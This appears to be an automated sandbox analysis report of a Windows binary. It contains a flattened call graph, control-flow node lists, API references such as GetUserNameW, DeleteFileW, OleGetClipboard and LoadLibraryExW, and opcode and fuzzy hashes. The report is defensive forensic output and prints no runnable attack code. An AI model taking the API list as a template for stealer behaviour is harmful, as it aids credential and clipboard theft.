LoadLibraryExW 34968->34971 34969->34952 34970->34952 34971->34969 34972->34963 34973->34963 34974->34964 34975->34964 34979 123100c 34976->34979 34977 1230b58 4 API calls 34977->34979 34978 123112a 34978->34884 34979->34977 34979->34978 35000 123f589 34979->35000 35005 123f598 34979->35005 35010 123f8c9 34979->35010 35020 123f8d0 34979->35020 35030 1231140 34979->35030 35045 123112f 34979->35045 34987 6c4003e 34986->34987 34989 6c40107 34987->34989 35092 6c40280 34987->35092 35096 6c40270 34987->35096 34988 6c400cd 34988->34989 35101 6c4bf7f 34988->35101 34989->34884 34994 6c40052 34993->34994 34996 6c40107 34994->34996 34998 6c40280 DeleteFileW 34994->34998 34999 6c40270 DeleteFileW 34994->34999 34995 6c400cd 34995->34996 34997 6c4bf7f KiUserCallbackDispatcher 34995->34997 34996->34884 34997->34996 34998->34995 34999->34995 35001 123f5b0 35000->35001 35003 123f60f 35001->35003 35060 123f53c 35001->35060 35003->34979 35006 123f5b0 35005->35006 35007 123f53c GetUserNameW 35006->35007 35009 123f60f 35006->35009 35008 123f601 35007->35008 35008->34979 35009->34979 35011 123f8e8 35010->35011 35012 123f92c 35011->35012 35015 123f946 35011->35015 35064 123f554 GetUserNameW 35012->35064 35016 1230b58 4 API calls 35015->35016 35017 123f9fa 35016->35017 35018 1230b58 4 API calls 35017->35018 35019 123fa5e 35018->35019 35021 123f8e8 35020->35021 35022 123f92c 35021->35022 35025 123f946 35021->35025 35065 123f554 GetUserNameW 35022->35065 35026 1230b58 4 API calls 35025->35026 35027 123f9fa 35026->35027 35028 1230b58 4 API calls 35027->35028 35029 123fa5e 35028->35029 35031 1231159 35030->35031 35039 1231174 35031->35039 35066 1231740 35031->35066 35032 1231184 35033 1230b58 4 API calls 35032->35033 35034 12311a4 35033->35034 35035 1230b58 4 API calls 35034->35035 35038 12311d0 35034->35038 35036 12311c4 35035->35036 35037 1230b58 4 API calls 35036->35037 35037->35038 35038->34979 35041 123117c 35039->35041 35072 123db79 35039->35072 35080 123dc28 35039->35080 35041->35032 35086 123dd90 35041->35086 35046 123113b 35045->35046 35054 1231174 35046->35054 35055 1231740 4 API calls 35046->35055 35047 1231184 35048 1230b58 4 API calls 35047->35048 35049 12311a4 35048->35049 35050 12311d0 35049->35050 35051 1230b58 4 API calls 35049->35051 35050->34979 35052 12311c4 35051->35052 35053 1230b58 4 API calls 35052->35053 35053->35050 35056 123117c 35054->35056 35057 123db79 4 API calls 35054->35057 35058 123dc28 4 API calls 35054->35058 35055->35054 35056->35047 35059 123dd90 4 API calls 35056->35059 35057->35056 35058->35056 35059->35047 35062 123f6d0 GetUserNameW 35060->35062 35063 123f81d 35062->35063 35067 1231766 35066->35067 35068 1230b58 4 API calls 35067->35068 35070 123178a 35068->35070 35069 123181c 35070->35069 35071 1230b58 4 API calls 35070->35071 35071->35070 35074 123dbd5 35072->35074 35076 123db82 35072->35076 35073 123dbda 35073->35041 35074->35073 35075 1230b58 4 API calls 35074->35075 35077 123dc7b 35075->35077 35076->35041 35078 123dcfc 35077->35078 35079 1230b58 4 API calls 35077->35079 35079->35077 35081 123dc2d 35080->35081 35082 1230b58 4 API calls 35081->35082 35085 123dc7b 35082->35085 35083 123dcfc 35083->35083 35084 1230b58 4 API calls 35084->35085 35085->35083 35085->35084 35087 123ddb6 35086->35087 35088 1230b58 4 API calls 35087->35088 35090 123ddda 35088->35090 35089 123debe 35090->35089 35091 1230b58 GetUserNameW GetUserNameW DeleteFileW KiUserCallbackDispatcher 35090->35091 35091->35090 35093 6c40296 35092->35093 35095 6c40948 DeleteFileW 35093->35095 35094 6c402ca 35094->34988 35095->35094 35097 6c402e5 35096->35097 35098 6c4027b 35096->35098 35097->34988 35100 6c40948 DeleteFileW 35098->35100 35099 6c402ca 35099->34988 35100->35099 35102 6c4bf83 35101->35102 35104 6c4bf7d 35102->35104 35105 6c4c001 35102->35105 35104->34989 35106 6c4c011 KiUserCallbackDispatcher 35105->35106 35107 6c4c03e 35106->35107 34862 6c44a58 34863 6c44a5d CreateWindowExW 34862->34863 34865 6c44b7c 34863->34865 35121 6c41078 35122 6c4107d 35121->35122 35123 6c4109b 35122->35123 35125 6c416c7 35122->35125 35126 6c416de 35125->35126 35127 6c4178f 35126->35127 35131 6c42550 35126->35131 35136 6c425b8 35126->35136 35141 6c425a8 35126->35141 35127->35122 35132 6c4254e 35131->35132 35132->35131 35133 6c42ebc 35132->35133 35146 6c45531 35132->35146 35155 6c455e3 35132->35155 35133->35126 35137 6c425bd 35136->35137 35138 6c42ebc 35137->35138 35139 6c45531 20 API calls 35137->35139 35140 6c455e3 20 API calls 35137->35140 35138->35126 35139->35137 35140->35137 35142 6c4254e 35141->35142 35142->35141 35143 6c42ebc 35142->35143 35144 6c45531 20 API calls 35142->35144 35145 6c455e3 20 API calls 35142->35145 35143->35126 35144->35142 35145->35142 35148 6c45544 35146->35148 35147 6c455f9 35148->35147 35164 6c45634 35148->35164 35170 6984d97 35148->35170 35175 6c45a48 35148->35175 35181 6984e38 35148->35181 35190 6c45b55 35148->35190 35199 6984da8 35148->35199 35156 6c455b8 35155->35156 35157 6c455f9 35156->35157 35158 6984e38 5 API calls 35156->35158 35159 6c45a48 12 API calls 35156->35159 35160 6984d97 5 API calls 35156->35160 35161 6c45634 12 API calls 35156->35161 35162 6984da8 5 API calls 35156->35162 35163 6c45b55 16 API calls 35156->35163 35158->35156 35159->35156 35160->35156 35161->35156 35162->35156 35163->35156 35166 6c4563d 35164->35166 35165 6c45b2b 35166->35165 35204 6c45ce0 35166->35204 35211 6c45bb7 35166->35211 35218 6c45f01 35166->35218 35171 6984db3 35170->35171 35172 6984e32 35171->35172 35173 6985b21 LoadLibraryExW LoadLibraryExW GetModuleHandleW GetModuleHandleW DeleteFileW 35171->35173 35174 6985e23 LoadLibraryExW LoadLibraryExW GetModuleHandleW GetModuleHandleW DeleteFileW 35171->35174 35172->35148 35173->35171 35174->35171 35176 6c45a62 35175->35176 35177 6c45b2b 35176->35177 35178 6c45bb7 12 API calls 35176->35178 35179 6c45ce0 12 API calls 35176->35179 35180 6c45f01 12 API calls 35176->35180 35178->35176 35179->35176 35180->35176 35182 6984df6 35181->35182 35183 6984e46 35181->35183 35258 6985b21 35182->35258 35263 6985e23 35182->35263 35191 6c45b5a 35190->35191 35193 6c45ae3 35190->35193 35272 6c42350 35191->35272 35192 6c45b2b 35192->35192 35193->35192 35196 6c45bb7 12 API calls 35193->35196 35197 6c45ce0 12 API calls 35193->35197 35198 6c45f01 12 API calls 35193->35198 35196->35193 35197->35193 35198->35193 35200 6984db3 35199->35200 35201 6984e32 35200->35201 35202 6985b21 LoadLibraryExW LoadLibraryExW GetModuleHandleW GetModuleHandleW DeleteFileW 35200->35202 35203 6985e23 LoadLibraryExW LoadLibraryExW GetModuleHandleW GetModuleHandleW DeleteFileW 35200->35203 35201->35148 35202->35200 35203->35200 35206 6c45be9 35204->35206 35205 6c45f30 35205->35166 35206->35205 35225 6c478c2 35206->35225 35236 6c478c8 35206->35236 35247 6c4c568 35206->35247 35252 6c4c578 35206->35252 35213 6c45bc8 35211->35213 35212 6c45f30 35212->35166 35213->35212 35214 6c4c568 4 API calls 35213->35214 35215 6c4c578 4 API calls 35213->35215 35216 6c478c2 4 API calls 35213->35216 35217 6c478c8 4 API calls 35213->35217 35214->35213 35215->35213 35216->35213 35217->35213 35220 6c45be9 35218->35220 35219 6c45f30 35219->35166 35220->35219 35221 6c478c2 4 API calls 35220->35221 35222 6c478c8 4 API calls 35220->35222 35223 6c4c568 4 API calls 35220->35223 35224 6c4c578 4 API calls 35220->35224 35221->35220 35222->35220 35223->35220 35224->35220 35226 6c478e5 35225->35226 35227 6c47a5d GetCurrentProcess 35226->35227 35233 6c47975 35226->35233 35228 6c47ad2 GetCurrentThread 35227->35228 35229 6c47acb 35227->35229 35230 6c47b0f GetCurrentProcess 35228->35230 35231 6c47b08 35228->35231 35229->35228 35235 6c47b45 35230->35235 35231->35230 35232 6c47b6d GetCurrentThreadId 35234 6c47b9e 35232->35234 35233->35206 35234->35206 35235->35232 35238 6c478e5 35236->35238 35237 6c47975 35237->35206 35238->35237 35239 6c47a5d GetCurrentProcess 35238->35239 35240 6c47ad2 GetCurrentThread 35239->35240 35241 6c47acb 35239->35241 35242 6c47b0f GetCurrentProcess 35240->35242 35243 6c47b08 35240->35243 35241->35240 35246 6c47b45 35242->35246 35243->35242 35244 6c47b6d GetCurrentThreadId 35245 6c47b9e 35244->35245 35245->35206 35246->35244 35248 6c4c578 35247->35248 35249 6c4c587 35248->35249 35250 1230b48 4 API calls 35248->35250 35251 1230b58 4 API calls 35248->35251 35249->35206 35250->35248 35251->35248 35253 6c4c587 35252->35253 35254 6c4c5e7 35252->35254 35253->35206 35255 6c4c6ed 35254->35255 35256 1230b48 4 API calls 35254->35256 35257 1230b58 4 API calls 35254->35257 35255->35206 35256->35254 35257->35254 35260 6985b50 35258->35260 35259 6985e4f 35260->35259 35262 69855c0 5 API calls 35260->35262 35268 6986489 35260->35268 35262->35260 35265 6985cec 35263->35265 35264 6985e4f 35265->35264 35266 6986489 5 API calls 35265->35266 35267 69855c0 5 API calls 35265->35267 35266->35265 35267->35265 35269 69864bd 35268->35269 35270 698669d 35269->35270 35271 6988358 5 API calls 35269->35271 35270->35260 35271->35270 35273 6c4235b 35272->35273 35274 6c488e9 35273->35274 35276 6c488d9 35273->35276 35277 6c488e7 35274->35277 35313 6c4763c 35274->35313 35283 698e00f 35276->35283 35291 6c48b05 35276->35291 35297 698df68 35276->35297 35302 698df62 35276->35302 35307 6c48b18 35276->35307 35284 698e013 35283->35284 35285 698dfa9 35283->35285 35290 698e031 35284->35290 35323 698f4c2 35284->35323 35287 698e00f 4 API calls 35285->35287 35320 698e020 35285->35320 35286 698e008 35286->35277 35287->35286 35290->35277 35292 6c48b26 35291->35292 35293 6c4763c 4 API calls 35292->35293 35294 6c48bfe 35292->35294 35334 6c4c060 35292->35334 35339 6c4c070 35292->35339 35293->35292 35294->35277 35298 698df7c 35297->35298 35300 698e00f 4 API calls 35298->35300 35301 698e020 4 API calls 35298->35301 35299 698e008 35299->35277 35300->35299 35301->35299 35304 698df68 35302->35304 35303 698e008 35303->35277 35305 698e00f 4 API calls 35304->35305 35306 698e020 4 API calls 35304->35306 35305->35303 35306->35303 35308 6c48b26 35307->35308 35309 6c4763c 4 API calls 35308->35309 35310 6c48bfe 35308->35310 35311 6c4c060 2 API calls 35308->35311 35312 6c4c070 2 API calls 35308->35312 35309->35308 35310->35277 35311->35308 35312->35308 35314 6c47647 35313->35314 35315 6c48d04 35314->35315 35316 6c48c5a 35314->35316 35317 6c42350 3 API calls 35315->35317 35318 6c48cb2 CallWindowProcW 35316->35318 35319 6c48c61 35316->35319 35317->35319 35318->35319 35319->35277 35321 698e031 35320->35321 35322 698f4c2 4 API calls 35320->35322 35321->35286 35322->35321 35325 6c4763c 4 API calls 35323->35325 35327 6c48c0a 35323->35327 35324 698f4da 35324->35290 35325->35324 35328 6c48c18 35327->35328 35329 6c48d04 35328->35329 35330 6c48c5a 35328->35330 35331 6c42350 3 API calls 35329->35331 35332 6c48cb2 CallWindowProcW 35330->35332 35333 6c48c61 35330->35333 35331->35333 35332->35333 35333->35324 35335 6c4c056 35334->35335 35337 6c4c06a 35334->35337 35335->35292 35336 6c4c07c 35336->35292 35337->35336 35343 6c4cd1f 35337->35343 35340 6c4c077 35339->35340 35341 6c4c07c 35340->35341 35342 6c4cd1f 2 API calls 35340->35342 35341->35292 35342->35340 35345 6c4cd35 35343->35345 35344 6c4cd7c 35344->35337 35345->35344 35349 6c4eea0 35345->35349 35360 6c4cd99 35345->35360 35346 6c4cd91 35346->35337 35350 6c4eeb2 35349->35350 35351 6c4eecd 35350->35351 35353 6c4ef11 35350->35353 35356 6c4eea0 2 API calls 35351->35356 35357 6c4cd99 2 API calls 35351->35357 35352 6c4eed3 35352->35346 35355 6c4ef91 35353->35355 35374 6980690 35353->35374 35379 69806a0 35353->35379 35354 6c4efaf 35354->35346 35355->35346 35356->35352 35357->35352 35364 6c4cdce 35360->35364 35361 6c4ee73 35362 6c4eecd 35361->35362 35366 6c4ef11 35361->35366 35370 6c4eea0 2 API calls 35362->35370 35371 6c4cd99 2 API calls 35362->35371 35363 6c4ee64 35363->35346 35364->35361 35364->35363 35367 6c4c070 OleGetClipboard OleGetClipboard 35364->35367 35365 6c4eed3 35365->35346 35369 6c4ef91 35366->35369 35372 6980690 2 API calls 35366->35372 35373 69806a0 2 API calls 35366->35373 35367->35364 35368 6c4efaf 35368->35346 35369->35346 35370->35365 35371->35365 35372->35368 35373->35368 35375 69806a0 35374->35375 35376 69806db 35375->35376 35377 6980748 OleGetClipboard 35375->35377 35378 698073c OleGetClipboard 35375->35378 35376->35354 35377->35375 35378->35375 35380 69806b5 35379->35380 35381 69806db 35380->35381 35382 6980748 OleGetClipboard 35380->35382 35383 698073c OleGetClipboard 35380->35383 35381->35354 35382->35380 35383->35380

                                                                                                                                Executed Functions

                                                                                                                                Function 0123F53C Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1172 123f53c-123f72f 1174 123f731-123f75c 1172->1174 1175 123f79a-123f79e 1172->1175 1184 123f75e-123f760 1174->1184 1185 123f78c 1174->1185 1176 123f7a0-123f7c3 1175->1176 1177 123f7c9-123f7d4 1175->1177 1176->1177 1179 123f7e0-123f81b GetUserNameW 1177->1179 1180 123f7d6-123f7de 1177->1180 1181 123f824-123f83a 1179->1181 1182 123f81d-123f823 1179->1182 1180->1179 1188 123f850-123f877 1181->1188 1189 123f83c-123f848 1181->1189 1182->1181 1186 123f782-123f78a 1184->1186 1187 123f762-123f76c 1184->1187 1193 123f791-123f794 1185->1193 1186->1193 1190 123f770-123f77e 1187->1190 1191 123f76e 1187->1191 1198 123f887 1188->1198 1199 123f879-123f87d 1188->1199 1189->1188 1190->1190 1196 123f780 1190->1196 1191->1190 1193->1175 1196->1186 1201 123f888 1198->1201 1199->1198 1200 123f87f 1199->1200 1200->1198 1201->1201
                                                                                                                                APIs
                                                                                                                                • GetUserNameW.ADVAPI32(00000000,00000000), ref: 0123F80B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.613890811.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_1230000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: NameUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2645101109-0
                                                                                                                                • Opcode ID: 48b26f9dac7cbdd91686140f00553bb87e7421ce023b96d0f9b9f92896892df1
                                                                                                                                • Instruction ID: cf5a2d18bd9b1e1ba346a61f82fbbd823060fefdc3fb241b0f38a90a533ce650
                                                                                                                                • Opcode Fuzzy Hash: 48b26f9dac7cbdd91686140f00553bb87e7421ce023b96d0f9b9f92896892df1
                                                                                                                                • Instruction Fuzzy Hash: 4A5135B4D10229CFDB18CFA9D989B9DBBF1BF88310F14811AE915AB350D7749844CF96
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06C478C8 Relevance: 6.3, APIs: 4, Instructions: 255COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4667c866342f826c7ddfc9b6611b229df875ef6cc7a2056faeca1245b2cbd0c1
                                                                                                                                • Instruction ID: 3b2a8057c32004493dcee278675ef884a8c737bff2e851c176080dae1051e46a
                                                                                                                                • Opcode Fuzzy Hash: 4667c866342f826c7ddfc9b6611b229df875ef6cc7a2056faeca1245b2cbd0c1
                                                                                                                                • Instruction Fuzzy Hash: 97B16CB0E002488FDB54DFA9D984B9EBBF1FF88314F14C16AE808AB351D7749944CBA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06C47A4A Relevance: 6.1, APIs: 4, Instructions: 125threadCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 06C47AB8
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 06C47AF5
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 06C47B32
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 06C47B8B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: 26ace720c441c1648d34b0df23abdcafc145ce5ddfde7b7831b1956f024e179a
                                                                                                                                • Instruction ID: 9d5633ccf068b5347111a3d3ef1ba9f16f812df5bd34c8c877d4d4a2315784b5
                                                                                                                                • Opcode Fuzzy Hash: 26ace720c441c1648d34b0df23abdcafc145ce5ddfde7b7831b1956f024e179a
                                                                                                                                • Instruction Fuzzy Hash: 145163B09007488FDB50DFAAC948B9EBFF1AF48314F208559E459A7290DB789944CF79
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06980040 Relevance: 2.0, APIs: 1, Instructions: 460comCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 958 6980040-6980061 959 6980063-6980066 958->959 960 6980068-6980071 959->960 961 6980080-6980083 959->961 964 69805e5 960->964 965 6980077-698007b 960->965 962 6980094-6980097 961->962 963 6980085-6980089 961->963 968 6980099-69800af 962->968 969 69800b4-69800b7 962->969 966 69805c8 963->966 967 698008f 963->967 970 69805ea-6980662 OleInitialize 964->970 965->961 971 69805cb-69805d4 966->971 967->962 968->969 972 69800c9-69800cc 969->972 973 69800b9-69800c4 969->973 974 698066b-6980688 970->974 975 6980664-698066a 970->975 971->960 977 69805da-69805e4 971->977 978 69800ce-69800ea 972->978 979 69800ef-69800f2 972->979 973->972 975->974 978->979 980 69800ff-6980102 979->980 981 69800f4-69800fa 979->981 984 698011e-6980121 980->984 985 6980104-6980113 980->985 981->980 989 698012b-698012e 984->989 990 6980123-6980128 984->990 985->966 994 6980119 985->994 989->971 993 6980134-6980136 989->993 990->989 995 6980138 993->995 996 698013d-6980140 993->996 994->984 995->996 996->959 997 6980146-6980187 996->997 997->966 1003 698018d-69801ad 997->1003 1003->966 1006 69801b3-6980201 1003->1006 1013 698020f 1006->1013 1014 6980203-698020d 1006->1014 1015 6980214-6980216 1013->1015 1014->1015 1016 698021c-698021e 1015->1016 1017 69805b1-69805c2 1015->1017 1018 698022c 1016->1018 1019 6980220-698022a 1016->1019 1017->966 1017->1006 1021 6980231-6980233 1018->1021 1019->1021 1021->1017 1022 6980239-698023d 1021->1022 1022->1017 1023 6980243-6980260 1022->1023 1026 698026f-6980276 1023->1026 1027 6980262-6980267 1023->1027 1028 698027c-6980286 1026->1028 1029 69805a4-69805a9 1026->1029 1027->1026 1030 6980288-698028d 1028->1030 1031 6980295-698029c 1028->1031 1029->1017 1030->1031 1031->1029 1033 69802a2-69802ac 1031->1033 1034 69802bb-69802c2 1033->1034 1035 69802ae-69802b3 1033->1035 1034->1029 1036 69802c8-69802d8 1034->1036 1035->1034 1037 69802da-69802df 1036->1037 1038 69802e7-69802ee 1036->1038 1037->1038 1038->1029 1039 69802f4-69802fe 1038->1039 1040 698030d-6980314 1039->1040 1041 6980300-6980305 1039->1041 1040->1029 1042 698031a-698034b 1040->1042 1041->1040 1046 698035a-6980361 1042->1046 1047 698034d-6980352 1042->1047 1046->1029 1048 6980367-6980371 1046->1048 1047->1046 1049 6980380-6980387 1048->1049 1050 6980373-6980378 1048->1050 1049->1029 1051 698038d-6980397 1049->1051 1050->1049 1052 6980399-698039e 1051->1052 1053 69803a6-69803ad 1051->1053 1052->1053 1053->1029 1054 69803b3-69803d5 1053->1054 1056 69803e4-69803eb 1054->1056 1057 69803d7-69803dc 1054->1057 1056->1029 1058 69803f1-69803fb 1056->1058 1057->1056 1059 698040a-6980411 1058->1059 1060 69803fd-6980402 1058->1060 1059->1029 1061 6980417-6980424 1059->1061 1060->1059 1062 6980484-698048b 1061->1062 1063 6980426-698042d 1061->1063 1066 698049a-69804a1 1062->1066 1067 698048d-6980492 1062->1067 1064 698043c-6980443 1063->1064 1065 698042f-6980434 1063->1065 1064->1029 1068 6980449-6980453 1064->1068 1065->1064 1066->1029 1069 69804a7-69804b1 1066->1069 1067->1066 1070 6980462-6980469 1068->1070 1071 6980455-698045a 1068->1071 1072 69804c0-69804c7 1069->1072 1073 69804b3-69804b8 1069->1073 1070->1029 1075 698046f-6980482 1070->1075 1071->1070 1072->1029 1074 69804cd-69804d3 1072->1074 1073->1072 1076 69804d6-69804fe 1074->1076 1075->1076 1081 698051d-698053d 1076->1081 1082 6980500-698051b 1076->1082 1089 6980540-69805a2 1081->1089 1082->1089 1089->1017
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6980000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Initialize
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                • Opcode ID: f8af75c839c1f0ad9f7a2aa0d468f40a708cbb2ffa5c95a1a8cc29489528bb5c
                                                                                                                                • Instruction ID: b5ffa7d96c73ef32ef3a7d567d0a11ccf4712ad2caeefc1535ba08ac58242511
                                                                                                                                • Opcode Fuzzy Hash: f8af75c839c1f0ad9f7a2aa0d468f40a708cbb2ffa5c95a1a8cc29489528bb5c
                                                                                                                                • Instruction Fuzzy Hash: F3125630A002448FCBA4EFA8C544B6DBBF6EF84354F25C4A9D41AAB651DB75EC49CF90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0698D7CF Relevance: 1.7, APIs: 1, Instructions: 224COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1099 698d7cf-698d7d8 1168 698d7de call 6c418a0 1099->1168 1169 698d7de call 6c4186f 1099->1169 1100 698d7e3-698d7e5 1101 698d7fb-698d7ff 1100->1101 1102 698d7e7 1100->1102 1103 698d801-698d80b 1101->1103 1104 698d813-698d854 1101->1104 1170 698d7ed call 698d7cf 1102->1170 1171 698d7ed call 698d9b0 1102->1171 1103->1104 1109 698d861-698d86f 1104->1109 1110 698d856-698d85e 1104->1110 1105 698d7f3-698d7f5 1105->1101 1106 698d930-698d938 1105->1106 1117 698d939-698d9a1 1106->1117 1111 698d871-698d876 1109->1111 1112 698d893-698d895 1109->1112 1110->1109 1114 698d878-698d87f call 698c9f0 1111->1114 1115 698d881 1111->1115 1116 698d898-698d89f 1112->1116 1119 698d883-698d891 1114->1119 1115->1119 1120 698d8ac-698d8b3 1116->1120 1121 698d8a1-698d8a9 1116->1121 1147 698d9a3-698d9a8 1117->1147 1119->1116 1124 698d8c0-698d8c9 call 698634c 1120->1124 1125 698d8b5-698d8bd 1120->1125 1121->1120 1129 698d8cb-698d8d3 1124->1129 1130 698d8d6-698d8db 1124->1130 1125->1124 1129->1130 1131 698d8f9-698d906 1130->1131 1132 698d8dd-698d8e4 1130->1132 1139 698d908-698d926 1131->1139 1140 698d929-698d92f 1131->1140 1132->1131 1134 698d8e6-698d8f6 call 6988d2c call 698ca00 1132->1134 1134->1131 1139->1140 1148 698d9aa-698d9ae 1147->1148 1149 698da22-698da50 1147->1149 1150 698d9b0-698d9b4 1148->1150 1151 698d9b5-698d9c6 1148->1151 1152 698da58-698da87 LoadLibraryExW 1149->1152 1153 698da52-698da55 1149->1153 1150->1151 1157 698d9c8-698d9d9 1151->1157 1158 698d9f6-698d9fb 1151->1158 1154 698da89-698da8f 1152->1154 1155 698da90-698daad 1152->1155 1153->1152 1154->1155 1162 698d9db-698d9e4 call 698ca10 1157->1162 1163 698d9ed-698d9f4 call 698ca1c 1157->1163 1166 698d9e9-698d9eb 1162->1166 1163->1158 1166->1158 1168->1100 1169->1100 1170->1105 1171->1105
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6980000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 98942c1e17b41b98b7381bf72baa76c79c20278a44d12ba9da27977764b8b1c0
                                                                                                                                • Instruction ID: 1285f22e88f8a0acdf43264247fadd70f5b53540635a003705fa8d2e1f788f95
                                                                                                                                • Opcode Fuzzy Hash: 98942c1e17b41b98b7381bf72baa76c79c20278a44d12ba9da27977764b8b1c0
                                                                                                                                • Instruction Fuzzy Hash: C4816B70A007059FD7A4EF2AD45076ABBF5BF88310F10892EE45AD7B80DB75E809CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0123F6C4 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1202 123f6c4-123f72f 1204 123f731-123f75c 1202->1204 1205 123f79a-123f79e 1202->1205 1214 123f75e-123f760 1204->1214 1215 123f78c 1204->1215 1206 123f7a0-123f7c3 1205->1206 1207 123f7c9-123f7d4 1205->1207 1206->1207 1209 123f7e0-123f81b GetUserNameW 1207->1209 1210 123f7d6-123f7de 1207->1210 1211 123f824-123f83a 1209->1211 1212 123f81d-123f823 1209->1212 1210->1209 1218 123f850-123f877 1211->1218 1219 123f83c-123f848 1211->1219 1212->1211 1216 123f782-123f78a 1214->1216 1217 123f762-123f76c 1214->1217 1223 123f791-123f794 1215->1223 1216->1223 1220 123f770-123f77e 1217->1220 1221 123f76e 1217->1221 1228 123f887 1218->1228 1229 123f879-123f87d 1218->1229 1219->1218 1220->1220 1226 123f780 1220->1226 1221->1220 1223->1205 1226->1216 1231 123f888 1228->1231 1229->1228 1230 123f87f 1229->1230 1230->1228 1231->1231
                                                                                                                                APIs
                                                                                                                                • GetUserNameW.ADVAPI32(00000000,00000000), ref: 0123F80B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.613890811.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_1230000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: NameUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2645101109-0
                                                                                                                                • Opcode ID: 3fc8fe4bf53069fa0b97da4e6408c2c2fd22e29524cafae5a3292093bc190ea8
                                                                                                                                • Instruction ID: 6c5737ad77ab2809e342c3f358355cdcaa9c0f05d88d03de1ea05d4b0ddd4482
                                                                                                                                • Opcode Fuzzy Hash: 3fc8fe4bf53069fa0b97da4e6408c2c2fd22e29524cafae5a3292093bc190ea8
                                                                                                                                • Instruction Fuzzy Hash: A55143B0D102298FDB18CFA9D985B9EBBB1BF88314F14811AE915BB390D7749844CF96
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0123F554 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1232 123f554-123f72f 1234 123f731-123f75c 1232->1234 1235 123f79a-123f79e 1232->1235 1244 123f75e-123f760 1234->1244 1245 123f78c 1234->1245 1236 123f7a0-123f7c3 1235->1236 1237 123f7c9-123f7d4 1235->1237 1236->1237 1239 123f7e0-123f81b GetUserNameW 1237->1239 1240 123f7d6-123f7de 1237->1240 1241 123f824-123f83a 1239->1241 1242 123f81d-123f823 1239->1242 1240->1239 1248 123f850-123f877 1241->1248 1249 123f83c-123f848 1241->1249 1242->1241 1246 123f782-123f78a 1244->1246 1247 123f762-123f76c 1244->1247 1253 123f791-123f794 1245->1253 1246->1253 1250 123f770-123f77e 1247->1250 1251 123f76e 1247->1251 1258 123f887 1248->1258 1259 123f879-123f87d 1248->1259 1249->1248 1250->1250 1256 123f780 1250->1256 1251->1250 1253->1235 1256->1246 1261 123f888 1258->1261 1259->1258 1260 123f87f 1259->1260 1260->1258 1261->1261
                                                                                                                                APIs
